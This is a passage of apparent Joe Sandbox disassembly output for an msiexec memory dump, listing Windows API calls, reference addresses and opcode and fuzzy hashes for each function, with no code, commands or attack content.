                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                              APIs
                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                              • String ID:
                                                              • API String ID: 2154303073-0
                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                              APIs
                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                              • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$PointerRead
                                                              • String ID:
                                                              • API String ID: 3154509469-0
                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                              APIs
                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                              • String ID:
                                                              • API String ID: 4232544981-0
                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                              APIs
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FileModuleName
                                                              • String ID:
                                                              • API String ID: 3859505661-0
                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                              APIs
                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                              APIs
                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                              • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                              APIs
                                                              • memset.MSVCRT ref: 004095FC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3655998216-0
                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                              APIs
                                                              • memset.MSVCRT ref: 00445426
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                              • String ID:
                                                              • API String ID: 1828521557-0
                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                              APIs
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@FilePointermemcpy
                                                              • String ID:
                                                              • API String ID: 609303285-0
                                                              • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                              • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID:
                                                              • API String ID: 2081463915-0
                                                              • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                              • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                              APIs
                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                              • String ID:
                                                              • API String ID: 2136311172-0
                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                              APIs
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@
                                                              • String ID:
                                                              • API String ID: 1936579350-0
                                                              • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                              • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
